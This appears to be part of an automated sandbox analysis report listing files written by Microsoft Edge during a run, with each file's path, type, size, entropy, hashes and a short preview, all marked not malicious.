                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                  Entropy (8bit):5.324614897111891
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R6:C1gAg1zfvC
                                                                                                                                                                                                                                                                  MD5:3825878BEEAA43D484D706AA4C2BA467
                                                                                                                                                                                                                                                                  SHA1:7878B78E56B181C695244F1F1E018F22AF4FB9E1
                                                                                                                                                                                                                                                                  SHA-256:1831A6A6D7B23DDDAFB637C266EA7B0664362B83BEFA4AC7AE6CD9DFBFA160E5
                                                                                                                                                                                                                                                                  SHA-512:62B8D008629B02ABD55D53C55B813AF474240BE79C470FC075637010B32A1E4E1B9F449B98155A8BD4C7CA585DD731421C0AD93E6A3DFF1FF71BC053FCD2F59D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.217076468838359
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oiM+q2P923oH+Tcwt8aPrqIFUt8OosZmw+OonTpMVkwO923oH+Tcwt8amLJ:77M+v4YebL3FUt8OP/+OOpMV5LYebQJ
                                                                                                                                                                                                                                                                  MD5:06D0015C4FE5D965D6AE8273E61124D5
                                                                                                                                                                                                                                                                  SHA1:1C793F734ADADD1EAC661C048B0A0B8D84122BE9
                                                                                                                                                                                                                                                                  SHA-256:CC7FAED3B1D7F2DA5B662C79A7B25B7F82A5EA579055608714157F00481BA14F
                                                                                                                                                                                                                                                                  SHA-512:D24E81157CE7C046C59C080BD112B3443A0526EDFFCF21A2DDCFD2DE293F01C2125DD1BA98D056DBAB91A85DBC8E01DF904A26DC2146F423BE9524DECB9BFD95
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.527 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-07:44:19.575 1d6c Recovering log #3.2024/12/19-07:44:19.577 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.217076468838359
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oiM+q2P923oH+Tcwt8aPrqIFUt8OosZmw+OonTpMVkwO923oH+Tcwt8amLJ:77M+v4YebL3FUt8OP/+OOpMV5LYebQJ
                                                                                                                                                                                                                                                                  MD5:06D0015C4FE5D965D6AE8273E61124D5
                                                                                                                                                                                                                                                                  SHA1:1C793F734ADADD1EAC661C048B0A0B8D84122BE9
                                                                                                                                                                                                                                                                  SHA-256:CC7FAED3B1D7F2DA5B662C79A7B25B7F82A5EA579055608714157F00481BA14F
                                                                                                                                                                                                                                                                  SHA-512:D24E81157CE7C046C59C080BD112B3443A0526EDFFCF21A2DDCFD2DE293F01C2125DD1BA98D056DBAB91A85DBC8E01DF904A26DC2146F423BE9524DECB9BFD95
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.527 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-07:44:19.575 1d6c Recovering log #3.2024/12/19-07:44:19.577 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.223180637147154
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7o2eMM+q2P923oH+Tcwt865IFUt8OopZmw+OoNMVkwO923oH+Tcwt86+ULJ:7leMM+v4Yeb/WFUt8O6/+OUMV5LYeb/L
                                                                                                                                                                                                                                                                  MD5:B15BEB50047C54EEFBA99D8682EB695F
                                                                                                                                                                                                                                                                  SHA1:83EC49426033F022F5A1D6697C53B6B6CD12E362
                                                                                                                                                                                                                                                                  SHA-256:70D716E86192EC76EAF85755E4FD4D597EE29459B7AFA4589577AB22E248A1CA
                                                                                                                                                                                                                                                                  SHA-512:2711C8051022AFD68FF47EC9F4EBABE8AA87136C89C5D614AE46BC4DD6723A296A530F6E64E144B12589C0D3C7052B6100CF5F921B677228AA8DBAF4A520DE13
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.589 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-07:44:19.590 1d6c Recovering log #3.2024/12/19-07:44:19.591 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.223180637147154
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7o2eMM+q2P923oH+Tcwt865IFUt8OopZmw+OoNMVkwO923oH+Tcwt86+ULJ:7leMM+v4Yeb/WFUt8O6/+OUMV5LYeb/L
                                                                                                                                                                                                                                                                  MD5:B15BEB50047C54EEFBA99D8682EB695F
                                                                                                                                                                                                                                                                  SHA1:83EC49426033F022F5A1D6697C53B6B6CD12E362
                                                                                                                                                                                                                                                                  SHA-256:70D716E86192EC76EAF85755E4FD4D597EE29459B7AFA4589577AB22E248A1CA
                                                                                                                                                                                                                                                                  SHA-512:2711C8051022AFD68FF47EC9F4EBABE8AA87136C89C5D614AE46BC4DD6723A296A530F6E64E144B12589C0D3C7052B6100CF5F921B677228AA8DBAF4A520DE13
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.589 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-07:44:19.590 1d6c Recovering log #3.2024/12/19-07:44:19.591 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.131743348983256
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPM7VOq2P923oH+Tcwt8NIFUt8OoPBZmw+OoPbkwO923oH+Tcwt8+eLJ:7yv4YebpFUt8Oq/+OW5LYebqJ
                                                                                                                                                                                                                                                                  MD5:64EEABD474BF45D40E092FE9491EC5A5
                                                                                                                                                                                                                                                                  SHA1:F9E676E67792B193A21211A885C21724C375E54D
                                                                                                                                                                                                                                                                  SHA-256:0E7B4E2FFBA2A2742773660E1C921E99C9D3331A20BFB050BC79E5E07BCE2127
                                                                                                                                                                                                                                                                  SHA-512:8C5702ADBC83A44FD77184E5D10F14689D0B28A2F926B6A3FBD87D1CDCEE30ABDE692FD453D8B1F8C05A22A60CB7C77EE5E5752F6F0CC7DDAF78220D725D4A0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.263 1d10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-07:44:20.264 1d10 Recovering log #3.2024/12/19-07:44:20.264 1d10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                  Entropy (8bit):5.131743348983256
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPM7VOq2P923oH+Tcwt8NIFUt8OoPBZmw+OoPbkwO923oH+Tcwt8+eLJ:7yv4YebpFUt8Oq/+OW5LYebqJ
                                                                                                                                                                                                                                                                  MD5:64EEABD474BF45D40E092FE9491EC5A5
                                                                                                                                                                                                                                                                  SHA1:F9E676E67792B193A21211A885C21724C375E54D
                                                                                                                                                                                                                                                                  SHA-256:0E7B4E2FFBA2A2742773660E1C921E99C9D3331A20BFB050BC79E5E07BCE2127
                                                                                                                                                                                                                                                                  SHA-512:8C5702ADBC83A44FD77184E5D10F14689D0B28A2F926B6A3FBD87D1CDCEE30ABDE692FD453D8B1F8C05A22A60CB7C77EE5E5752F6F0CC7DDAF78220D725D4A0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.263 1d10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-07:44:20.264 1d10 Recovering log #3.2024/12/19-07:44:20.264 1d10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                                                  Entropy (8bit):0.637722600776921
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:+eg5tqBqBshH+bDo3iN0Z2TVJkXBBE3yb+e:+bA8GhIU3iGAIBBE3qV
                                                                                                                                                                                                                                                                  MD5:B4F3EA1DFDA6DB4B279265B43E43646B
                                                                                                                                                                                                                                                                  SHA1:1916DD2582AA91A163F23A32508745F97E4D7078
                                                                                                                                                                                                                                                                  SHA-256:2B9BCCF4E930A1F8360652AC2F661F6EB5316BA47DFE4A6C80A2D8BFFA2DAC32
                                                                                                                                                                                                                                                                  SHA-512:6F9B33572440882B4B0BDD23FE3F80EAFB789AE72FD5A6B7FD3F78C5880EFDFF926FF4445147167C69FAD96BE47CDDB90D9F644257AC489BA9F1A1A05C6950F7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.2181099731442955
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:ORtFlljq7A/mhWJFuQ3yy7IOWUO1udweytllrE9SFcTp4AGbNCV9RUIdn:h75fOdd0Xi99pEY3n
                                                                                                                                                                                                                                                                  MD5:7DC74BF28891ECD187D8715E01BA8CB3
                                                                                                                                                                                                                                                                  SHA1:9D8DED6CFE9E7BE5C76AB582D586EA966E56F0C9
                                                                                                                                                                                                                                                                  SHA-256:BC81748FAAE33F597A82BD9A78FF948D2A4431888DF5D2F96B32874D7A43E7AB
                                                                                                                                                                                                                                                                  SHA-512:E79F34E0EF26BAD72E873E28FBA05BDF474BF80522E92F5C798CB32CC5649B6BD278869A49ADC140AEABF453FF688F05C13ABF9E3039C477B42A412873AEF8E9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:............+..t...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                  Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                  MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                  SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                  SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                  SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                  Entropy (8bit):5.265125029271238
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7AAv4Yeb8rcHEZrELFUt8OBh/+OB75LYeb8rcHEZrEZSJ:7Ay4Yeb8nZrExg8OnLLYeb8nZrEZe
                                                                                                                                                                                                                                                                  MD5:AF2750ECA78EF25ECFD507A47B7F755F
                                                                                                                                                                                                                                                                  SHA1:215E33B57374B5ACE17054EE543259F081E98146
                                                                                                                                                                                                                                                                  SHA-256:C75B3BBBA8D4E2D44107843D422CB64BA337C0444236298F2F4B5CA323BF1720
                                                                                                                                                                                                                                                                  SHA-512:D701741A158147D61C06A1756740B3E3EC6B5D7D30CFBC747F661179DDB802C579F2936CC2A111CB280A74365CE42854F6D80D054EB3EA521A1B73BC820D8A14
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.166 1d10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-07:44:23.167 1d10 Recovering log #3.2024/12/19-07:44:23.167 1d10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                  Entropy (8bit):5.265125029271238
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7AAv4Yeb8rcHEZrELFUt8OBh/+OB75LYeb8rcHEZrEZSJ:7Ay4Yeb8nZrExg8OnLLYeb8nZrEZe
                                                                                                                                                                                                                                                                  MD5:AF2750ECA78EF25ECFD507A47B7F755F
